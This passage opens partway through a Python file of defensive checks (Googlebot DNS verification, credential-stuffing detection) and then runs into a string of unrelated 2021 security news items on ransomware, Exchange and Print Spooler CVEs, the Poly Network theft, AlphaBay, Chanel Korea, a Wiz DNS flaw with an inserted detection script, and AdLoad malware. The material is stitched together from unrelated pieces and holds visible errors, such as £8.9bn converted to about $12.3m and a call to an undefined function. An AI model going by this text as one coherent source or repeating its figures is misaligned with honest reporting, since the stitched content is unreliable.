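REVERSE_DNS = {"66.249.66.1": "crawl-66-249-66-1.googlebot.com", "203.0.113.50": "vps-1138.hosting.example"}
FORWARD_DNS = {"crawl-66-249-66-1.googlebot.com": ["66.249.66.1"]}


def rdns(ip: str) -> Optional[str]:
    return REVERSE_DNS.get(ip)


def fdns(host: str) -> List[str]:
    return FORWARD_DNS.get(host, [])


GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# --- credential stuffing --------------------------------------------------------------
LoginEvent = Tuple[str, str, bool]  # (client ip, username, success)


def credential_stuffing_sources(events: Iterable[LoginEvent], min_attempts: int = 20,
                                min_distinct_users: int = 10, max_success_rate: float = 0.10) -> List[str]:
    """Sources that spray many different usernames with a low hit rate. A real user who
    mistypes a password retries the same name; a stuffing bot walks a leaked list."""
    stats: Dict[str, dict] = defaultdict(lambda: {"attempts": 0, "ok": 0, "users": set()})
    for ip, user, ok in events:
        s = stats[ip]
        s["attempts"] += 1
        s["ok"] += int(ok)
        s["users"].add(user.lower())
    return sorted(ip for ip, s in stats.items()
                  if s["attempts"] >= min_attempts
                  and len(s["users"]) >= min_distinct_users
                  and s["ok"] / s["attempts"] <= max_success_rate)


# Constructed events: two genuine users (one fat-fingers twice) and one stuffing source.
LOGIN_EVENTS: List[LoginEvent] = (
    [("198.51.100.4", "jdoe", False), ("198.51.100.4", "jdoe", False), ("198.51.100.4", "jdoe", True)]
    + [("198.51.100.9", "asmith", True)] * 5
    + [("203.0.113.77", f"user{i:03d}", i in (7, 31)) for i in range(40)]
)

if __name__ == "__main__":
    print("googlebot from 66.249.66.1  ->", verify_crawler("66.249.66.1", GOOGLEBOT_UA, rdns, fdns))
    print("googlebot from 203.0.113.50 ->", verify_crawler("203.0.113.50", GOOGLEBOT_UA, rdns, fdns))
    print("stuffing sources:", credential_stuffing_sources(LOGIN_EVENTS))
```

    In production the two resolver callables wrap real lookups with a timeout and a cache, and the stuffing counters run over a sliding window rather than the whole history; note that a botnet spreading attempts across many IPs will stay under the per-IP thresholds, which is why Imperva pairs this with blocking of known hosting and proxy ranges.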

    The U.S. is presently combating two pandemics: coronavirus and ransomware. Both have partially shut down parts of the economy. In the case of ransomware, lax security gives attackers an easy way to rake in millions.

    It’s pretty simple for hackers to gain financially, using malicious software to access and encrypt data and hold it hostage until the victim pays the ransom.

    Cyber attacks are more frequent now because it is effortless for hackers to execute them. Further, the payment methods are now friendlier to them. In addition, businesses are willing to pay a ransom because of the growing reliance on digital infrastructure, giving hackers more incentives to attempt more breaches.

    Bolder cybercriminals

    A few years back, cybercriminals played psychological games to get bank passwords and then used their technical know-how to steal money from people’s accounts. They are bolder now because it is easy for them to buy ransomware as a service and learn hacking techniques from video-sharing sites like YouTube. Some cyber gangs even offer to set up the whole extortion operation for an affiliate, for a fee that is typically a share of the profits.

    Cryptocurrency made the hackers bolder, as it let them demand large payments with little apparent attribution. Bitcoin transfers are pseudonymous rather than anonymous (every transaction sits on a public ledger, and ransom payments have been traced and in some cases seized by law enforcement), but the perceived anonymity was enough for attackers to start demanding far higher sums from their victims.

    The rise in attacks can also be blamed on firms that are willing to pay millions of dollars in bitcoin. Attacks would decline if firms and security teams made hacking unprofitable.

    Are cyber attacks getting a higher profile or actually rising?

    The answer to both questions is yes. Ransomware is becoming more common because it is straightforward to execute: attackers use scanning tools to find security holes, or trick network users with phishing tactics such as sending malware that appears to come from a trusted source. In addition, as became clear recently, some large companies have been lax with their network security.

    One such case is the ransomware attack on Colonial Pipeline, whose CEO Joseph Blount told Congress that the attackers got in through a legacy VPN account that did not require multifactor authentication.

    Based on the FBI’s 2020 Internet Crime Report, the bureau received close to 2,500 ransomware complaints in 2020, 20 percent more than in 2019. The FBI also put the reported cost of ransomware attacks in 2020 at close to $29.1 million, more than triple the $8.9 million reported for 2019.

    Another contributing factor to the rise in ransomware attacks is the growing number of online users. The coronavirus pandemic caused a spike in worldwide internet usage. Many students and workers are working and learning remotely.

    Cybercrime Magazine predicts that ransomware will cost victims about $265 billion each year starting 2031. Attacks are likely to occur every two seconds as hackers refine their malware attacks and extortion practices.

    Impact of ransomware on business

    We already know how ransomware can have devastating effects on businesses, large or small. But it pays to be reminded time and again because even enterprises can become victims. Cybercriminals continue to exploit vulnerabilities in network security systems. In addition, many hacking gangs are using ransomware and denial-of-service attacks for financial gains.

    Aside from the increasing occurrence of ransomware attacks, the cost of the attacks is growing as well. Ransomware paralyzes a company’s digital network and associated devices. Because sensitive business data is breached, business operations, particularly for supply chains, are affected–thus, companies prefer to pay a ransom.

    But even if a company pays the ransom, there is no guarantee that the sensitive data has not been copied. Likewise, there is no guarantee that the attackers will return all the data or that the decryption key will work. In Colonial’s case, the decryption tool the hackers provided after the ransom was paid was too slow, so Colonial fell back on its own backup files. Kaseya, on the other hand, chose to obtain a decryption key through a third party.

    Preventing ransomware infection

    The FBI advises companies never to pay a ransom to cybercriminals, because doing so encourages them to launch more attacks. Some ways to prevent such attacks include:

    • Working with a cybersecurity firm that provides a security system fitting the business’s current and future needs is one of the primary options.
    • Staying vigilant is another way to thwart infection. If your systems are slowing down for no apparent reason, disconnect them from the internet and shut them down. Then call your network security provider and ask for help. The Biden administration encourages businesses to beef up their cybersecurity programs and review their corporate security plans. Further, you should cooperate with the FBI and the Ransomware and Digital Extortion Task Force of the U.S. Department of Justice.

    Aside from the technical aspect of assuring cybersecurity, sometimes it pays to go back to basics.

    • Use security training so your employees have a better understanding of the importance and meaning of cybersecurity. Employees should also learn how their own actions protect the entire company from cyber attacks.
    • Train yourself and your staff not to click on links from unverified sources, as phishing emails are one of the main methods of spreading malware and making your company an easy target. Always scan emails, and flag emails that originate outside the organization so employees can see them.
    • Practice creating regular backups of your data. Have at least two data backups and store them at separate locations. Grant access to your backups only to your most trusted staff.
    • Use data encryption to protect emails, file exchanges, and personal information.
    • Update all your applications regularly so that known vulnerabilities are patched.
    • Use password managers to ensure that all employees have stronger passwords. Instruct employees to use a different password for each application used in your company.

    Conclusion

    Ransomware attacks are rampant because they are easy and profitable. Knowing about the activities of cybercriminal gangs and providing employee training on cybersecurity is vital. Combining technological expertise with basic security practices will help mitigate ransomware infection. Above all, don’t panic, and know the security measures you should follow.


    The UK Government has launched a new program to “spark a wave of growth” in the UK’s cyber sector.

    The Department for Digital, Culture, Media and Sport (DCMS) announced the initiative, known as “Cyber Runway,” today. It will be delivered by Plexal, CyLon, Deloitte and The Centre for Secure Information Technologies (CSIT).

    Cyber Runway will give entrepreneurs and businesses from across the UK—England, Wales, Scotland and Northern Ireland—access to business masterclasses, mentoring, product development support, networking events and backing to trade internationally and secure investment. DCMS said it is aiming to support at least 160 organizations over the course of six months.

    In the last financial year, the cybersecurity sector’s revenue grew by 7%. The number of companies in the sector grew by 21%, with the sector now worth £8.9bn (approximately $12.3m).

    According to the DCMS, companies that have participated in the government’s cyber growth initiatives in the past have, on average, more than tripled their revenues year-on-year.

    “The UK’s cyber sector is booming and we’re working tirelessly to ensure the benefits are felt by businesses and individuals right across the country,” commented Matt Warman, Minister for Digital Infrastructure. “Our new Cyber Runway program will help tackle barriers to growth, increase investment and give firms vital support to take their businesses to the next level.”

    The program is looking to focus on Scotland, Northern Ireland, Wales, the North East, North West and the South West of England to support the UK government’s ‘levelling up’ agenda. It will also support founders and innovators from a “diverse range of backgrounds,” in a bid to grow underrepresented groups in the UK’s cyber sector such as women and people from Black, Asian and minority ethnic backgrounds.

    Saj Huq, director of innovation, Plexal, said: “COVID-19 has catalyzed the need for effective cybersecurity across industries, and a record level of capital is being invested into the sector. But there is still a need for support for businesses at the earliest stages of their development and innovators and entrepreneurs from underrepresented communities still face barriers when entering the ecosystem.

    “These are challenges we look forward to addressing with Cyber Runway by supporting the best innovators, regardless of their background or geography, to thrive and grow.”

    Cyber Runway follows a number of other DCMS-funded cyber programs which have now completed. These include HutZero, Cyber 101 and Tech Nation’s cyber accelerator for scaleups.

    Earlier this week, the National Cyber Security Centre (NCSC) unveiled the first five cyber firms to take part in another government-backed cyber startup program, which is designed to support innovative cybersecurity firms to develop products that will help protect critical areas of the UK’s economy and society from online harms.

    Over one-third of organizations worldwide have experienced a ransomware attack or breach that blocked access to systems or data in the previous 12 months, according to new research.

    In a survey conducted by the International Data Corporation (IDC), it was found that many organizations that fell victim to ransomware experienced multiple ransomware events. In the US, the incident rate was notably lower (7%) compared to the worldwide rate of 37%.

    “Ransomware has become the enemy of the day; the threat that was first feared on Pennsylvania Avenue and subsequently detested on Wall Street is now the topic of conversation on Main Street,” commented Frank Dickson, program vice president, cybersecurity products, IDC. “As the greed of cyber miscreants has been fed, ransomware has evolved in sophistication, moving laterally, elevating privileges, actively evading detection, exfiltrating data and leveraging multifaceted extortion. Welcome to digital transformation’s dark side.”

    The research, entitled IDC’s 2021 Ransomware Study: Where You Are Matters!, showed that the manufacturing and finance industries reported the highest ransomware incident rates. The transportation, communication and utilities and media industries reported the lowest.

    When it came to paying the piper, only 13% of organizations said that they had experienced a ransomware attack and not paid the ransom. For those that did, the average ransom payment was almost $250,000, with a few large ransom payments of over $1m.

    The report shared the responses of nearly 800 IT decision makers and influencers. The July 2021 survey focused on topics such as attention from the board of directors, ransomware payments, the size and number of ransomware payments, and the exfiltration of data.

    Based on the responses, IDC found that companies that were further along in their digital transformation journey were less likely to have experienced a ransomware attack.

    Joseph Carson, chief security scientist and advisory chief information security officer at ThycoticCentrify, believes that traditional cybersecurity solutions have failed to prevent ransomware from infecting organizations and creating mass disruption: “Conventional, signature-based antivirus programs are unable to prevent and detect these types of attacks due to the unique and quickly growing variants of ransomware.

    “Encrypting your data doesn’t necessarily deter ransomware attacks either,” he continued. “Attackers may still threaten to publicly disclose that data, expecting that others are willing to pay for the opportunity to break the encryption.”

    The research comes after Accenture, the global consulting firm, was the victim of a ransomware attack known as Lockbit 2.0. The Australian Cyber Security Centre (ACSC) also alerted organizations in the country that cyber-criminals were frequently using Lockbit 2.0 ransomware.

    “The ACSC has received reporting from several Australian organizations that have been impacted by LockBit 2.0 ransomware,” said the alert. “This activity has occurred across multiple industry sectors.”

    Oliver Tavakoli, CTO at Vectra, a San Jose, Calif.-based AI cybersecurity company, explained that while a company culture of educating employees is helpful in preventing ransomware, it will “only get you so far.”

    Threat actors are actively carrying out opportunistic scanning and exploitation of Exchange servers using a new exploit chain that leverages a trio of flaws affecting on-premises installations, making them the latest set of Exchange bugs to be abused after the ProxyLogon vulnerabilities were exploited en masse at the start of the year.

    The remote code execution flaws have been collectively dubbed “ProxyShell.” At least 30,000 machines are affected by the vulnerabilities, according to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center.

    “Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,” NCC Group’s Richard Warren tweeted, noting that one of the intrusions resulted in the deployment of a “C# aspx webshell in the /aspnet_client/ directory.”

    Patched in early March 2021, ProxyLogon is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server that permits an attacker to take control of a vulnerable server as an administrator, and which can be chained with another post-authentication arbitrary-file-write vulnerability, CVE-2021-27065, to achieve code execution.

    The vulnerabilities came to light after Microsoft spilled the beans on a Beijing-sponsored hacking operation that leveraged the weaknesses to strike entities in the U.S. for purposes of exfiltrating information in what the company described as limited and targeted attacks.

    Since then, the Windows maker has fixed six more flaws in its mail server component, two of which are collectively called ProxyOracle and enable an adversary to recover a user’s password in plaintext.

    Three other issues — known as ProxyShell — could be abused to bypass ACL controls and elevate privileges on the Exchange PowerShell backend, effectively authenticating the attacker and allowing remote code execution. Microsoft noted that both CVE-2021-34473 and CVE-2021-34523 were inadvertently omitted from publication until July.

    ProxyLogon:

    • CVE-2021-26855 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
    • CVE-2021-26857 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
    • CVE-2021-26858 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
    • CVE-2021-27065 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)

    ProxyOracle:

    • CVE-2021-31195 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on May 11)
    • CVE-2021-31196 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on July 13)

    ProxyShell:

    • CVE-2021-31207 – Microsoft Exchange Server Security Feature Bypass Vulnerability (Patched on May 11)
    • CVE-2021-34473 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on April 13, advisory released on July 13)
    • CVE-2021-34523 – Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on April 13, advisory released on July 13)

    Other:

    • CVE-2021-33768 – Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on July 13)

    The ProxyShell attack chain was first demonstrated at the Pwn2Own hacking competition this April; technical details were disclosed by DEVCORE researcher Orange Tsai at the Black Hat USA 2021 and DEF CON security conferences last week. To prevent exploitation attempts, organizations are strongly advised to install the updates released by Microsoft.


    The hacker behind the largest cryptocurrency theft ever recorded has paid back nearly half ($260m) of the money to the victim organization, Poly Network.

    Earlier this week, it was reported that hackers exploited a vulnerability in Poly Network, a company that implements interoperability between different blockchains, that enabled them to change the address of the “keeper role” of a blockchain contract and “construct any transaction at will and withdraw any amount of funds from the contract.”

    This enabled the hacker to transfer $610m to three different addresses.

    Following the incident, Poly Network took to Twitter to urge the attackers to return the money, stating: “We want to establish communication with you and urge you to return the hacked assets. The amount of money you hacked is the biggest one in defi history. Law enforcement in any country will regard this as a major economic crime and you will be pursued. It is very unwise for you to do any further transactions. The money you stole are from tens of thousands of crypto currency members, hence the people.

    “You should talk to us to work out a solution.”

    The hacker subsequently posted a three-page ‘Q&A’ in which they provided more details on how they carried out the heist and claimed to have ethical motives, stating it was “always the plan” to return the funds and that they were “not very interested in money.” The hacker added: “I know it hurts when people are attacked, but shouldn’t they learn something from those hacks?”

    Poly Network has since revealed that $260m of “assets” have been returned in three cryptocurrencies: $3.3m worth of Ethereum, $256m worth of Binance Coin and $1m worth of Polygon. However, $269m worth of Ethereum and $84m worth of Polygon have still not been recovered.

    Commenting on the story, Arseny Reutov, head of the application security research team at Positive Technologies, said: “When such a massive hack occurs, everyone’s attention is fixed on a particular cryptocurrency address. Although DeFi is non-custodial, some protocols can blacklist any address, for example, USDT stablecoin, which blacklisted the attacker’s address preventing him or her from moving the funds.

    “Withdrawing such a large amount of money is a challenge in cryptocurrency. Although there are some cryptocurrency mixers that can complicate the tracking of the funds, it appears the hacker quickly realized he or she didn’t have a plan for this, which likely led to the decision to transfer the stolen funds back.”

    Ransomware operators such as Magniber and Vice Society are actively exploiting vulnerabilities in Windows Print Spooler to compromise victims and spread laterally across a victim’s network to deploy file-encrypting payloads on targeted systems.

    “Multiple, distinct threat actors view this vulnerability as attractive to use during their attacks and may indicate that this vulnerability will continue to see more widespread adoption and incorporation by various adversaries moving forward,” Cisco Talos said in a report published Thursday, corroborating an independent analysis from CrowdStrike, which observed instances of Magniber ransomware infections targeting entities in South Korea.

    While Magniber ransomware was first spotted in late 2017 singling out victims in South Korea through malvertising campaigns, Vice Society is a new entrant that emerged on the ransomware landscape in mid-2021, primarily targeting public school districts and other educational institutions. The attacks are said to have taken place since at least July 13.

    Since June, a series of “PrintNightmare” issues affecting the Windows print spooler service has come to light that could enable remote code execution when the component performs privileged file operations –

    • CVE-2021-1675 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on June 8)
    • CVE-2021-34527 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on July 6-7)
    • CVE-2021-34481 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)
    • CVE-2021-36936 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)
    • CVE-2021-36947 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)
    • CVE-2021-34483 – Windows Print Spooler Elevation of Privilege Vulnerability (Patched on August 10)
    • CVE-2021-36958 – Windows Print Spooler Remote Code Execution Vulnerability (Unpatched)

    CrowdStrike noted it was able to successfully prevent attempts made by the Magniber ransomware gang at exploiting the PrintNightmare vulnerability.

    Vice Society, on the other hand, leveraged a variety of techniques to conduct post-compromise discovery and reconnaissance prior to bypassing native Windows protections for credential theft and privilege escalation.

    Specifically, the attacker is believed to have used a malicious library associated with the PrintNightmare flaw (CVE-2021-34527) to pivot to multiple systems across the environment and extract credentials from the victim.

    “Adversaries are constantly refining their approach to the ransomware attack lifecycle as they strive to operate more effectively, efficiently, and evasively,” the researchers said. “The use of the vulnerability known as PrintNightmare shows that adversaries are paying close attention and will quickly incorporate new tools that they find useful for various purposes during their attacks.”


    Police in Europe have arrested nearly two dozen individuals on suspicion of being part of an international group of online fraudsters.

    The alleged cyber-criminals are accused of cheating companies in at least 20 countries out of approximately $1.17m.

    Charges were brought against 23 individuals on August 10. The suspects were taken into custody in a series of raids simultaneously carried out at 34 addresses in Ireland, Romania, and the Netherlands.

    Europol, which coordinated the action, said the cyber-criminal gang had been running scams for years, updating its tactics to exploit current events.

    “The fraud was run by an organized crime group which prior to the COVID-19 pandemic already illegally offered other fictitious products for sale online, such as wooden pellets,” said Europol in a press release.

    “Last year the criminals changed their modus operandi and started offering protective materials after the outbreak of the COVID-19 pandemic.”

    The group accused of running the scams is allegedly made up of individuals hailing from various countries in Africa, who relocated to Europe. There, they created fake web pages and email addresses that allowed them to impersonate legitimate wholesale companies.

    Members of the group, posing as employees of these wholesalers, would then defraud other companies by soliciting orders from them and requesting payments in advance of goods’ being shipped.

    Victim companies – most of which were located in Europe and Asia – sent the money in good faith; however, the goods they had ordered never arrived.

    Europol said that the gang’s criminal proceeds “were laundered through Romanian bank accounts controlled by the criminals before being withdrawn at ATMs.”

    An ongoing investigation into the cyber-criminal gang has been supported by Europol since 2017. Assistance offered by the organization included the deployment of two of its cyber-crime experts to the raids that took place in the Netherlands to help secure relevant evidence and support Dutch authorities with cross-checking data against real-time information gathered during the operation.

    This latest coordinated action against cybercrime follows an Interpol operation that led to the arrest of an alleged 45-year-old sexual predator and human trafficker on August 6 in Guatemala. The unnamed man is suspected of producing and distributing child sexual abuse material.

    A boutique cybersecurity firm that provides the financial, health care and retail sectors with custom security services has been acquired by technology security firm GoVanguard.

    Gotham Security, acquired by the firm for an undisclosed sum, was described by GoVanguard CEO Mahdi Hedhli as a close partner of some years’ standing.

    The headquarters of Gotham Security are situated a two-minute walk away from world-famous landmark the Empire State Building. The company, which specializes in professional security services and managed security SOC services, has a second office in Washington, DC.

    Gotham Security CEO Trevor Goering and COO Blake Shalem co-founded the company in 2013. Following the acquisition, Shalem will be joining GoVanguard as its chief customer officer.

    She said: “This move allows us to elevate what we do best, which translates to a superior class of protection for our clients.”

    GoVanguard said the acquisition would allow it to provide elite-level cybersecurity to its clients, which include Odyssey Group, nTopology, Insurance Technologies, and Abacus Group.

    “As threat actors become more sophisticated, it’s become obvious that the best defense is to go on the offensive. Adversary simulation has become increasingly valuable for organizations looking to quickly gauge and improve their security position. After all, if you can’t measure it, you can’t improve it,” said Hedhli.

    “Gotham Security has been a close partner for years, and this was a natural next step to allow our red-teaming experts to take our clients’ defenses to the next level and continue our dedication to finding the security gaps before cyber-criminals do.”

    Gotham offers security assessments that include penetration testing, phishing vulnerability analysis, and an evaluation of an organization’s system for weak points.

    GoVanguard said that the acquisition was part of a move to provide clients with adversarial red-team tactic cybersecurity assistance that could identify and resolve vulnerabilities before cyber-criminals had a chance to strike.

    “We’re doubling down on our commitment to improve the cybersecurity landscape by honing our focus on red teaming,” Hedhli said. “We feel this is the area where GoVanguard makes the biggest impact for our clients and the industry as a whole.”

    Illicit underground marketplace relaunches years after takedown.

    The illicit marketplace AlphaBay appears to have resurfaced, four years after a high-profile takedown by international law enforcement agencies.

    The reboot, according to researchers at Flashpoint, isn’t an exact replica. Rather, the reconstituted version of the site is described as an homage to the original and a tribute to the now-deceased alleged AlphaBay moderator Alexandre Cazes.

    This latest revamp is headed by threat actor DeSnake, who is believed to be an original moderator of AlphaBay. According to Flashpoint researchers, DeSnake is attempting to win the trust of criminals by claiming “threat actors operating on the forum [can] withdraw funds even if all servers are seized.”

    Other changes include the banning of posts about illicit drugs, COVID-19 vaccines and ransomware. Site operators also say they will remove posts related to threat activity related to Russia, Belarus, Kazakhstan, Armenia and Kyrgyzstan to avoid unwanted attention by law enforcement in those countries.

    In an additional promotional pitch, the service’s operators promise “updated source code for a famous banking trojan.” There is no indication of which “famous” banking trojan is meant.

    Hacker Heyday

    When AlphaBay was shut down in 2017 in a joint effort by law enforcement across Europe and Asia, it had more than 200,000 users and 40,000 vendors selling illicit goods. At the time, Threatpost reported there were more than 250,000 listings for drugs and toxic chemicals, 100,000 for malware, hacking tools, guns, fake documents and much more.

    The old AlphaBay’s infrastructure supported what is believed to be the largest known criminal market on the internet. It was seized by U.S. officials along with authorities in Thailand, the Netherlands, Lithuania, Canada, France and the U.K.

    AlphaBay was a Tor hidden service and its vendors and customers sold and bought goods using Bitcoin, Monero, Ethereum and other cryptocurrencies. Authorities said the market was also used to launder hundreds of millions of dollars.

    In its blog post, Flashpoint said its initial AlphaBay report was based on one by Tom Robinson at Elliptic.


    The Korean arm of French luxury brand Chanel has issued an apology after personal data belonging to its customers was exposed.

    In a statement issued earlier this week, Chanel Korea blamed the data leak that happened on August 8 on a recent cyber-attack. A database belonging to the famed perfume and fashion brand is believed to have been compromised by a hacker or hackers at some point between August 5 and 6.

    Data exfiltrated in the attack and later leaked included some customers’ names, birth dates, gender, phone numbers, and shopping history.

    The Korea Herald reported that other sensitive information contained in the compromised database, including customers’ IDs, passwords, and payment information, had not been leaked.

    “Parts of our database, containing the personal information of the customers who had registered for our cosmetics brand membership, have been compromised. The leaked personal information included names, birthdays, phone numbers and product purchase lists,” Chanel Korea wrote on its official website.

    The company asked customers who suspect that their data has been misused to make contact by phone or email.

    “We sincerely apologize to our customers for the matter and the inconvenience it caused,” stated Chanel Korea.

    The company went on to say that it has hired “a leading independent cybersecurity firm” to investigate the attack and gauge its full impact.

    Chanel Korea said that it had not found any “evidence of further impact on other systems and data” but had reported the incident to the Korea Internet & Security Agency (KISA). The matter is also under investigation by Korea’s Personal Information Protection Commission (PIPC).

    Customers are reportedly being informed of the cyber-attack and data breach via email and text messages. Chanel Korea has not published details on how many individuals were impacted by the security incident.

    One Chanel Korea customer told the Korea Times that the brand ought to do more than just apologize to its customers.

    They said: “When we think of Chanel, we expect the best-quality products and high-level service. That is why we spend thousands of dollars at their boutiques. Chanel Korea should compensate its customers who were affected by the cyber-attack.”

    Threatpost interviews Wiz CTO about a vulnerability recently patched by Amazon Route53’s DNS service and Google Cloud DNS.

    LAS VEGAS – Amazon and Google patched a domain name service (DNS) bug that allowed attackers to snoop on the confidential networking settings of companies – revealing computer and employee names along with office locations and exposed web resources.

    The vulnerability, outlined in a Black Hat USA 2021 talk last week, is a new class of vulnerabilities affecting major DNS-as-a-Service (DNSaaS) providers, according to researchers at the cloud security firm Wiz.

    Ami Luttwak, co-founder and CTO of Wiz, said the bug allows an adversary to conduct unprecedented reconnaissance on a target – namely any vulnerable corporate network that inadvertently allows this type of network eavesdropping.

    While Amazon and Google have patched the bug, Luttwak warns the problem is likely widespread.

    Threatpost caught up with Luttwak at Black Hat for a video interview.

    Wiz revealed the vulnerability affecting DNSaaS providers Amazon Route53 and Google Cloud DNS, which both promptly patched the bug in February.

    Going Down the DNS Loophole

    “We found a simple loophole that allowed us to intercept a portion of worldwide dynamic DNS traffic going through managed DNS providers like Amazon and Google. Essentially, we ‘wiretapped’ the internal network traffic of 15,000 organizations (including Fortune 500 companies and government agencies) and millions of devices,” Wiz wrote in a technical breakdown of the bug.

    Luttwak calls what he found a “loophole” within the process used to handle the now obsolete dynamic DNS within modern DNS server configurations.

    “We registered a new domain on the Route 53 platform with the same name as their official DNS server. (Technically, we created a new ‘hosted zone’ inside AWS name server ns-1611.awsdns-09.co.uk and named it ‘ns-852.awsdns-42.net’),” researchers explained.

    Next, the researchers gained control of the hosted zone by registering thousands of name servers with the same name as the DNSaaS provider’s official DNS server. “Whenever a DNS client queries this name server about itself (which thousands of devices do automatically to update their IP address within their managed network – more on that in a minute), that traffic goes directly to our IP address,” Wiz wrote.

    What researchers observed next was a flood of dynamic DNS traffic from Windows machines that were querying the “hijacked name server” about itself. In all, researchers profiled 15,000 organizations (some Fortune 500 companies), 45 U.S. government agencies and 85 international government agencies.

    Misconfiguration or Vulnerability?

    DNSaaS providers Route53 and Google Cloud DNS fixed the issue by disallowing the type of copycat registration that mirrored their own DNS server.

    As for Microsoft, researchers said that the company considered this to be a misconfiguration issue.

    “Microsoft could provide a global solution by updating its dynamic DNS algorithm. However, when we reported our discovery to Microsoft, they told us that they did not consider it a vulnerability but rather a known misconfiguration that occurs when an organization works with external DNS resolvers,” researchers said.

    Luttwak said that companies can avoid this type of DNS exploitation by configuring their DNS resolvers properly so dynamic DNS updates do not leave the internal network.
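As an added example (not from Wiz’s research or this article), the following Python script shows the defender-side check that the advice above implies: it parses a raw DNS message, identifies dynamic-update messages (opcode 5, RFC 2136) and flags any that are addressed to a name server outside the organization’s internal ranges, i.e. updates that would leave the internal network. The packet bytes, destination addresses and the RFC 1918 ranges used as the "internal" definition are constructed assumptions; replace the ranges with your own.

```python
import ipaddress
import struct
from typing import List, Optional, Tuple

OPCODE_QUERY = 0
OPCODE_UPDATE = 5  # RFC 2136 dynamic DNS update

# Assumption: "internal" means the RFC 1918 ranges; substitute your own address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip: str) -> bool:
    """True when the address falls inside one of the configured internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def encode_name(name: str) -> bytes:
    """Encode a dotted hostname into DNS wire format (uncompressed labels)."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(data: bytes, offset: int) -> Tuple[str, int]:
    """Decode a wire-format name at offset; returns (dotted name, offset after the name)."""
    labels: List[str] = []
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:  # compression pointer (RFC 1035 section 4.1.4)
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            tail, _ = decode_name(data, pointer)
            labels.append(tail)
            return ".".join(labels), offset + 2
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def parse_dns_message(data: bytes) -> dict:
    """Parse the 12-byte header and the first entry of section 1.

    For a QUERY that entry is the question; for an UPDATE it is the zone (RFC 2136 2.3).
    """
    if len(data) < 12:
        raise ValueError("truncated DNS message")
    msg_id, flags, count1, count2, count3, count4 = struct.unpack("!HHHHHH", data[:12])
    opcode = (flags >> 11) & 0xF
    name, off = "", 12
    rtype = rclass = 0
    if count1:
        name, off = decode_name(data, 12)
        rtype, rclass = struct.unpack("!HH", data[off:off + 4])
    return {
        "id": msg_id,
        "opcode": opcode,
        "is_update": opcode == OPCODE_UPDATE,
        "zone_or_qname": name,
        "type": rtype,
        "class": rclass,
        # In an UPDATE the third count is UPCOUNT, the number of update RRs carried
        "update_rr_count": count3 if opcode == OPCODE_UPDATE else 0,
    }


def check_update_egress(data: bytes, dst_ip: str) -> Optional[str]:
    """Return an alert when a dynamic UPDATE is addressed outside the internal ranges."""
    msg = parse_dns_message(data)
    if not msg["is_update"] or is_internal(dst_ip):
        return None
    return (f"dynamic DNS UPDATE for zone {msg['zone_or_qname']} "
            f"sent to external name server {dst_ip}")


def build_message(opcode: int, name: str, rtype: int = 1) -> bytes:
    """Build a minimal message: header plus one section-1 entry (constructed test input)."""
    flags = (opcode & 0xF) << 11
    header = struct.pack("!HHHHHH", 0x1234, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", rtype, 1)


# Constructed samples (packet, destination IP); not captured traffic.
SAMPLES = [
    (build_message(OPCODE_QUERY, "www.example.com"), "8.8.8.8"),                # ordinary lookup
    (build_message(OPCODE_UPDATE, "corp.example.internal", 6), "10.0.0.53"),    # update stays inside
    (build_message(OPCODE_UPDATE, "corp.example.internal", 6), "203.0.113.10"),  # update leaks out
]


def run_samples() -> List[Optional[str]]:
    """Run the egress check over the constructed samples; None means no alert."""
    return [check_update_egress(packet, dst) for packet, dst in SAMPLES]


if __name__ == "__main__":
    for alert in run_samples():
        print(alert or "ok")
```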


    A crush of new attacks using the well-known adware involves at least 150 updated samples, many of which aren’t recognized by Apple’s built-in security controls.

    A swelling wave of AdLoad malware infections in macOS devices is cresting its way past Apple’s on-device malware scanner, researchers said. The campaign is using around 150 unique samples, some of which are signed by Apple’s notarization service.

    AdLoad is a well-known Apple threat that’s been circulating for years. It’s essentially a trojan that opens a backdoor on the affected system in order to download and install adware or potentially unwanted programs (PUPs). It’s also capable of gathering and transmitting information about victim machines, such as username and computer name. It’s also been seen hijacking search engine results and injecting advertisements into web pages.

    It’s changed up its tactics lately, creating an opportunity to evade on-board security.

    “This year we have seen another iteration that continues to impact Mac users who rely solely on Apple’s built-in security control XProtect for malware detection,” Phil Stokes, researcher at SentinelOne’s SentinelLabs, said in a Wednesday posting. “XProtect arguably has around 11 different signatures for AdLoad [but] the variant used in this new campaign is undetected by any of those rules.”

    The AdLoader Infection Routine

    The 2021 variants of AdLoad have a new approach to infection, the researcher said. First, they begin their assault by installing a persistence agent in the user’s Library LaunchAgents folder, using either the .system or .service file extension, according to Stokes’ technical analysis.

    When the user logs in, that persistence agent executes a binary hidden in the same user’s ~/Library/Application Support/ folder. That folder in Application Support in turn contains another directory called /Services/, which itself contains a “minimal application bundle,” Stokes explained.

